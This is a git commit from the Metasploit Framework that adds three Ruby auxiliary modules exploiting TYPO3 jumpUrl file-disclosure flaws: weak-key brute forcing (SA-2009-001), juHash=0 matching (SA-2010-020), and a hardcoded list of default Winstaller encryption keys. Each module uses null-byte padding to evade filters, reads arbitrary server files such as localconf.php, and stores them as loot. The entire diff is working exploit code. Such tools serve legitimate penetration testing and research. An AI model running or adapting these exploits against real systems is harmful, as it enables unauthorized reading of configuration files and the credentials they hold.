Add #5364
git-svn-id: file:///home/svn/framework3/trunk@14181 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
12378b45d6
commit
7ffcf62a2e
|
@ -0,0 +1,158 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit4 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'TYPO3 sa-2009-001 Weak Encryption Key File Disclosure',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
This module exploits a flaw in TYPO3 encryption ey creation process to allow for
|
||||
file disclosure in the jumpUrl mechanism. This flaw can be used to read any file
|
||||
that the web server user account has access to view.
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
['OSVDB', '51536'],
|
||||
['URL', 'http://blog.c22.cc/advisories/typo3-sa-2009-001'],
|
||||
['URL', 'http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-001/'],
|
||||
],
|
||||
'DisclosureDate' => 'Jan 20 2009',
|
||||
'Author' => [ 'Chris John Riley' ],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('URI', [true, "TYPO3 Path", "/"]),
|
||||
OptString.new('RFILE', [true, "The remote file to download", 'typo3conf/localconf.php']),
|
||||
OptString.new('ENC_KEY', [false, "Encryption key if known", '']),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def enc_key(seed)
|
||||
|
||||
if datastore['ENC_KEY'] != ''
|
||||
final = datastore['ENC_KEY']
|
||||
print_status("Using provided Encryption Key")
|
||||
else
|
||||
# build the encrption key to check
|
||||
seed = seed.to_s()
|
||||
rnd1 = Digest::MD5.hexdigest(seed)
|
||||
rnd2 = Digest::MD5.hexdigest(rnd1)
|
||||
rnd3 = Digest::MD5.hexdigest(rnd1 + rnd2)
|
||||
final = rnd1 + rnd2 + rnd3
|
||||
end
|
||||
|
||||
return final
|
||||
end
|
||||
|
||||
def run
|
||||
|
||||
# Add padding to bypass TYPO3 security filters
|
||||
#
|
||||
# Null byte fixed in PHP 5.3.4
|
||||
#
|
||||
|
||||
case datastore['RFILE']
|
||||
when nil
|
||||
# Nothing
|
||||
when /localconf.php$/i
|
||||
jumpurl = "#{datastore['RFILE']}%00/."
|
||||
jumpurl_len = (jumpurl.length) -2 #Account for difference in length with null byte
|
||||
jumpurl_enc = jumpurl.sub("%00", "\00") #Replace %00 with \00 to correct null byte format
|
||||
print_status("Adding padding to end of #{datastore['RFILE']} to avoid TYPO3 security filters")
|
||||
when /^..(\/|\\)/i
|
||||
print_error("Directory traversal detected... you might want to start that with a /.. or \\..")
|
||||
else
|
||||
jumpurl_len = (datastore['RFILE'].length)
|
||||
jumpurl = "#{datastore['RFILE']}"
|
||||
jumpurl_enc = "#{datastore['RFILE']}"
|
||||
end
|
||||
|
||||
print_status("Establishing a connection to #{rhost}:#{rport}")
|
||||
print_status("Trying to retrieve #{datastore['RFILE']}")
|
||||
print_status("Rotating through possible weak encryption keys")
|
||||
|
||||
for i in (0..1000)
|
||||
|
||||
final = enc_key(i)
|
||||
|
||||
locationData = Rex::Text::rand_text_numeric(1) +'::'+ Rex::Text::rand_text_numeric(2)
|
||||
juarray = "a:3:{i:0;s:#{jumpurl_len.to_s()}:\"#{jumpurl_enc}\""
|
||||
juarray << ";i:1;s:#{locationData.length}:\"#{locationData}\""
|
||||
juarray << ";i:2;s:#{final.length}:\"#{final}\";}"
|
||||
|
||||
juhash = Digest::MD5.hexdigest(juarray)
|
||||
juhash = juhash[0..9] # shortMD5 value for use as juhash
|
||||
|
||||
file_uri = "#{datastore['URI']}/index.php?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=#{juhash}"
|
||||
file_uri = file_uri.sub("//", "/") # Prevent double // from appearing in uri
|
||||
vprint_status("Checking Encryption Key [#{i}/1000]: #{final}")
|
||||
|
||||
begin
|
||||
file = send_request_raw({
|
||||
'uri' => file_uri,
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
{
|
||||
'Connection' => 'Close',
|
||||
}
|
||||
},25)
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE => e
|
||||
print_error(e.message)
|
||||
end
|
||||
|
||||
case file.headers['Content-Type']
|
||||
when 'text/html'
|
||||
case file.body
|
||||
when 'jumpurl Secure: "' + datastore['RFILE'] + '" was not a valid file!'
|
||||
print_error("File #{datastore['RFILE']} does not exist.")
|
||||
print_good("Discovered encryption key : #{final}")
|
||||
return
|
||||
when 'jumpurl Secure: locationData, ' + locationData + ', was not accessible.'
|
||||
print_error("File #{datastore['RFILE']} is not accessible.")
|
||||
print_good("Discovered encryption key : #{final}")
|
||||
return
|
||||
when 'jumpurl Secure: The requested file was not allowed to be accessed through jumpUrl (path or file not allowed)!'
|
||||
print_error("File #{datastore['RFILE']} is not allowed to be accessed through jumpUrl.")
|
||||
print_good("Discovered encryption key : #{final}")
|
||||
return
|
||||
end
|
||||
when 'application/octet-stream'
|
||||
addr = Rex::Socket.getaddress(rhost) # Convert rhost to ip for DB
|
||||
print_good("Discovered encryption key : #{final}")
|
||||
print_good("Writing local file " + File.basename(datastore['RFILE'].downcase) + " to loot")
|
||||
store_loot("typo3_" + File.basename(datastore['RFILE'].downcase), "text/xml", addr, file.body, "typo3_" + File.basename(datastore['RFILE'].downcase), "Typo3_sa_2009_001")
|
||||
return
|
||||
else
|
||||
if datastore['ENC_KEY'] != ''
|
||||
print_error("Encryption Key specified is not correct")
|
||||
return
|
||||
else
|
||||
# Try next encryption key
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
print_error("#{rhost}:#{rport} [Typo3-SA-2009-001] Failed to retrieve file #{datastore['RFILE']}")
|
||||
|
||||
end
|
||||
|
||||
end
|
|
@ -0,0 +1,142 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'thread'
|
||||
|
||||
class Metasploit4 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'TYPO3 sa-2010-020 Remote File Disclosure',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
This module exploits a flaw in the way the TYPO3 jumpurl feature matches hashes.
|
||||
Due to this flaw a Remote File Disclosure is possible by matching the juhash of 0.
|
||||
This flaw can be used to read any file that the web server user account has access to view.
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'http://typo3.org/teams/security/security-bulletins/typo3-sa-2010-020'],
|
||||
['URL', 'http://gregorkopf.de/slides_berlinsides_2010.pdf'],
|
||||
],
|
||||
'Author' =>
|
||||
[
|
||||
'Chris John Riley',
|
||||
'Gregor Kopf', # Original Discovery
|
||||
],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('URI', [true, "TYPO3 Path", "/"]),
|
||||
OptString.new('RFILE', [true, "The remote file to download", 'typo3conf/localconf.php']),
|
||||
OptInt.new('MAX_TRIES', [true, "Maximum tries", 10000]),
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def run
|
||||
|
||||
# Add padding to bypass TYPO3 security filters
|
||||
#
|
||||
# Null byte fixed in PHP 5.3.4
|
||||
#
|
||||
|
||||
case datastore['RFILE']
|
||||
when nil
|
||||
# Nothing
|
||||
when /localconf.php$/i
|
||||
jumpurl = "#{datastore['RFILE']}%00/."
|
||||
when /^..(\/|\\)/i
|
||||
print_error("Directory traversal detected... you might want to start that with a /.. or \\..")
|
||||
else
|
||||
jumpurl = "#{datastore['RFILE']}"
|
||||
end
|
||||
|
||||
print_status("Establishing a connection to #{rhost}:#{rport}")
|
||||
print_status("Trying to retrieve #{datastore['RFILE']}")
|
||||
|
||||
location_base = Rex::Text::rand_text_numeric(1)
|
||||
counter = 0
|
||||
|
||||
queue = []
|
||||
print_status("Creating request queue")
|
||||
|
||||
1.upto(datastore['MAX_TRIES']) do
|
||||
counter = counter +1
|
||||
locationData = "#{location_base}::#{counter}"
|
||||
queue << "#{datastore['URI']}/index.php?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=0"
|
||||
if ((counter.to_f/datastore['MAX_TRIES'].to_f)*100.0).to_s =~ /(25|50|75|100).0$/ # Display percentage complete every 25%
|
||||
percentage = (counter.to_f/datastore['MAX_TRIES'].to_f)*100
|
||||
print_status("Queue #{percentage.to_i}% compiled - [#{counter} / #{datastore['MAX_TRIES']}]")
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
print_status("Queue compiled. Beginning requests... grab a coffee!")
|
||||
|
||||
counter = 0
|
||||
queue.each do |check|
|
||||
counter = counter +1
|
||||
check = check.sub("//", "/") # Prevent double // from appearing in uri
|
||||
begin
|
||||
|
||||
file = send_request_raw({
|
||||
'uri' => check,
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
{
|
||||
'Connection' => 'Close',
|
||||
}
|
||||
},25)
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE => e
|
||||
print_error(e.message)
|
||||
end
|
||||
|
||||
if ((counter.to_f/queue.length.to_f)*100.0).to_s =~ /\d0.0$/ # Display percentage complete every 10%
|
||||
percentage = (counter.to_f/queue.length.to_f)*100.0
|
||||
print_status("Requests #{percentage.to_i}% complete - [#{counter} / #{queue.length}]")
|
||||
end
|
||||
|
||||
case file.headers['Content-Type']
|
||||
when 'text/html'
|
||||
case file.body
|
||||
when 'jumpurl Secure: "' + datastore['RFILE'] + '" was not a valid file!'
|
||||
print_error("File #{datastore['RFILE']} does not exist.")
|
||||
return
|
||||
when /jumpurl Secure: locationData/i
|
||||
print_error("File #{datastore['RFILE']} is not accessible.")
|
||||
return
|
||||
when 'jumpurl Secure: The requested file was not allowed to be accessed through jumpUrl (path or file not allowed)!'
|
||||
print_error("File #{datastore['RFILE']} is not allowed to be accessed through jumpUrl.")
|
||||
return
|
||||
end
|
||||
when 'application/octet-stream'
|
||||
addr = Rex::Socket.getaddress(rhost) # Convert rhost to ip for DB
|
||||
print_good("Found matching hash")
|
||||
print_good("Writing local file " + File.basename(datastore['RFILE'].downcase) + " to loot")
|
||||
store_loot("typo3_" + File.basename(datastore['RFILE'].downcase), "text/xml", addr, file.body, "typo3_" + File.basename(datastore['RFILE'].downcase), "Typo3_sa_2010_020")
|
||||
return
|
||||
end
|
||||
end
|
||||
|
||||
print_error("#{rhost}:#{rport} [Typo3-SA-2010-020] Failed to retrieve file #{datastore['RFILE']}")
|
||||
|
||||
end
|
||||
|
||||
end
|
|
@ -0,0 +1,211 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit4 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::Report
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'TYPO3 Winstaller default Encryption Keys',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
This module exploits known default encryption keys found in the TYPO3 Winstaller.
|
||||
This flaw allows for file disclosure in the jumpUrl mechanism. This issue can be
|
||||
used to read any file that the web server user account has access to view.
|
||||
|
||||
The method used to create the juhash (short MD5 hash) was altered in later versions
|
||||
of Typo3. Use the show actions command to display and select the version of TYPO3 in
|
||||
use (defaults to the older method of juhash creation).
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
['URL', 'http://typo3winstaller.sourceforge.net/'],
|
||||
],
|
||||
'Author' => [ 'Chris John Riley' ],
|
||||
'License' => MSF_LICENSE,
|
||||
'Actions' =>
|
||||
[
|
||||
[ 'Short_MD5',
|
||||
{
|
||||
'Description' => 'TYPO3 4.1.13 (or earlier), 4.2.12 (or earlier), 4.3.3 (or earlier), or 4.4.0'
|
||||
}
|
||||
],
|
||||
[ 'MIME',
|
||||
{
|
||||
'Description' => 'TYPO3 4.1.14 (or later), 4.2.13 - 4.2.14, 4.3.4 - 4.3.6, or 4.4.1 - 4.4.3'
|
||||
}
|
||||
],
|
||||
[ 'HMAC_SHA1',
|
||||
{
|
||||
'Description' => 'TYPO3 4.2.15 (or later), 4.3.7 (or later), 4.4.4 (or later), 4.5.0 (or later)'
|
||||
}
|
||||
]
|
||||
],
|
||||
'DefaultAction' => 'Short_MD5'
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(8503),
|
||||
OptString.new('URI', [true, "TYPO3 Path", "/"]),
|
||||
OptString.new('RFILE', [true, "The remote file to download", 'typo3conf/localconf.php']),
|
||||
OptString.new('ENC_KEY', [false, "Encryption key if known", '']),
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
def run
|
||||
|
||||
# Add padding to bypass TYPO3 security filters
|
||||
#
|
||||
# Null byte fixed in PHP 5.3.4
|
||||
#
|
||||
|
||||
case datastore['RFILE']
|
||||
when nil
|
||||
# Nothing
|
||||
when /localconf.php$/i
|
||||
jumpurl = "#{datastore['RFILE']}%00/."
|
||||
jumpurl_len = (jumpurl.length) -2 #Account for difference in length with null byte
|
||||
jumpurl_enc = jumpurl.sub("%00", "\00") #Replace %00 with \00 to correct null byte format
|
||||
print_status("Adding padding to end of #{datastore['RFILE']} to avoid TYPO3 security filters")
|
||||
when /^..(\/|\\)/i
|
||||
print_error("Directory traversal detected... you might want to start that with a /.. or \\..")
|
||||
else
|
||||
jumpurl_len = (datastore['RFILE'].length)
|
||||
jumpurl = "#{datastore['RFILE']}"
|
||||
jumpurl_enc = "#{datastore['RFILE']}"
|
||||
end
|
||||
|
||||
case action.name
|
||||
when 'Short_MD5'
|
||||
print_status("Performing downloading using Short_MD5 style juHash creation - see show actions for more details")
|
||||
when 'MIME'
|
||||
print_status("Performing downloading using MIME style juHash creation - see show actions for more details")
|
||||
when 'HMAC_SHA1'
|
||||
print_status("Performing downloading using HMAC_SHA1 style juHash creation - see show actions for more details")
|
||||
end
|
||||
|
||||
print_status("Establishing a connection to #{rhost}:#{rport}")
|
||||
print_status("Trying to retrieve #{datastore['RFILE']}")
|
||||
|
||||
if datastore['ENC_KEY'] != ''
|
||||
encryption_keys = [datastore['ENC_KEY']]
|
||||
print_status("Using provided Encryption Key")
|
||||
else
|
||||
print_status("Rotating through known encryption keys")
|
||||
encryption_keys = [
|
||||
#TYPO3 4.3.x - 4.4.x
|
||||
'd696ab49a803d7816021cb1768a6917d',
|
||||
'47d1e990583c9c67424d369f3414728e6793d9dc2ae3429d488a7374bc85d2a0b19b62de67d46a6079a75f10934288d3',
|
||||
'7b13b2203029ed80337f27127a9f1d28c2597f4c08c9a07b782b674731ecf5328c4d900851957899acdc6d4f911bf8b7',
|
||||
#TYPO3 4.4.7+
|
||||
'fbbdebd9091d914b3cd523485afe7b03e6006ade4125e4cf4c46195b3cecbb9ae0fe0f7b5a9e72ea2ac5f17b66f5abc7',
|
||||
#TYPO3 4.5.0
|
||||
'def76f1d8139304b7edea83b5f40201088ba70b20feabd8b2a647c4e71774b7b0e4086e4039abaf5d4f6a521f922e8a2',
|
||||
'bac0112e14971f00431639342415ff22c3c3bf270f94175b8741c0fa95df244afb61e483c2facf63cffc320ed61f2731',
|
||||
#TYPO3 4.5.2
|
||||
'14b1225e2c277d55f54d18665791f114f4244f381113094e2a19dfb680335d842e10460995eb653d105a562a5415d9c7',
|
||||
#TYPO3 4.5.3
|
||||
'5d4eede80d5cec8df159fd869ec6d4041cd2fc0136896458735f8081d4df5c22bbb0665ddac56056023e01fbd4ab5283',
|
||||
#TYPO3 4.5.4 - 4.5.7
|
||||
'b2aae63def4c512ce8f4386e57b8a48b40312de30775535cbff60a6eab356809a0b596edaad49c725d9963d93aa2ffae',
|
||||
]
|
||||
end
|
||||
|
||||
counter = 0
|
||||
encryption_keys.each do |enc_key|
|
||||
|
||||
counter = counter +1
|
||||
locationData = Rex::Text::rand_text_numeric(1) +'::'+ Rex::Text::rand_text_numeric(2)
|
||||
|
||||
case action.name
|
||||
when 'Short_MD5'
|
||||
juarray = "a:3:{i:0;s:#{jumpurl_len.to_s()}:\"#{jumpurl_enc}\""
|
||||
juarray << ";i:1;s:#{locationData.length}:\"#{locationData}\""
|
||||
juarray << ";i:2;s:#{enc_key.length}:\"#{enc_key}\";}"
|
||||
juhash = Digest::MD5.hexdigest(juarray)
|
||||
juhash = juhash[0..9] # shortMD5 value for use as juhash
|
||||
when 'MIME'
|
||||
juarray = "a:4:{i:0;s:#{jumpurl_len.to_s()}:\"#{jumpurl_enc}\""
|
||||
juarray << ";i:1;s:#{locationData.length}:\"#{locationData}\";i:2;s:0:\"\""
|
||||
juarray << ";i:3;s:#{enc_key.length}:\"#{enc_key}\";}"
|
||||
juhash = Digest::MD5.hexdigest(juarray)
|
||||
juhash = juhash[0..9] # shortMD5 value for use as juhash
|
||||
when 'HMAC_SHA1'
|
||||
juarray = "a:3:{i:0;s:#{jumpurl_len.to_s()}:\"#{jumpurl_enc}\""
|
||||
juarray << ";i:1;s:#{locationData.length}:\"#{locationData}\";i:2;"
|
||||
juarray << "s:0:\"\";}"
|
||||
juhash = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::Digest.new('sha1'), enc_key, juarray)
|
||||
end
|
||||
|
||||
file_uri = "#{datastore['URI']}/index.php?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=#{juhash}"
|
||||
file_uri = file_uri.sub("//", "/") # Prevent double // from appearing in uri
|
||||
vprint_status("Checking Encryption Key [#{counter}/#{encryption_keys.length}]: #{enc_key}")
|
||||
|
||||
begin
|
||||
file = send_request_raw({
|
||||
'uri' => file_uri,
|
||||
'method' => 'GET',
|
||||
'headers' =>
|
||||
{
|
||||
'Connection' => 'Close',
|
||||
}
|
||||
},25)
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
|
||||
print_error(e.message)
|
||||
return
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE => e
|
||||
print_error(e.message)
|
||||
return
|
||||
end
|
||||
|
||||
case file.headers['Content-Type']
|
||||
when 'text/html'
|
||||
case file.body
|
||||
when 'jumpurl Secure: "' + datastore['RFILE'] + '" was not a valid file!'
|
||||
print_error("File #{datastore['RFILE']} does not exist.")
|
||||
print_good("Discovered encryption key : #{enc_key}")
|
||||
return
|
||||
when 'jumpurl Secure: locationData, ' + locationData + ', was not accessible.'
|
||||
print_error("File #{datastore['RFILE']} is not accessible.")
|
||||
print_good("Discovered encryption key : #{enc_key}")
|
||||
return
|
||||
when 'jumpurl Secure: The requested file was not allowed to be accessed through jumpUrl (path or file not allowed)!'
|
||||
print_error("File #{datastore['RFILE']} is not allowed to be accessed through jumpUrl.")
|
||||
print_good("Discovered encryption key : #{enc_key}")
|
||||
return
|
||||
end
|
||||
when 'application/octet-stream'
|
||||
addr = Rex::Socket.getaddress(rhost) # Convert rhost to ip for DB
|
||||
print_good("Discovered encryption key : #{enc_key}")
|
||||
print_good("Writing local file " + File.basename(datastore['RFILE'].downcase) + " to loot")
|
||||
store_loot("typo3_" + File.basename(datastore['RFILE'].downcase), "text/xml", addr, file.body, "typo3_" + File.basename(datastore['RFILE'].downcase), "Typo3_winstaller")
|
||||
return
|
||||
else
|
||||
if datastore['ENC_KEY'] != ""
|
||||
print_error("Encryption Key specified is not correct")
|
||||
return
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
print_error("#{rhost}:#{rport} [Typo3] Failed to retrieve file #{datastore['RFILE']}")
|
||||
print_error("Maybe try checking the ACTIONS - Currently using #{action.name}")
|
||||
|
||||
end
|
||||
|
||||
end
|
Loading…
Reference in New Issue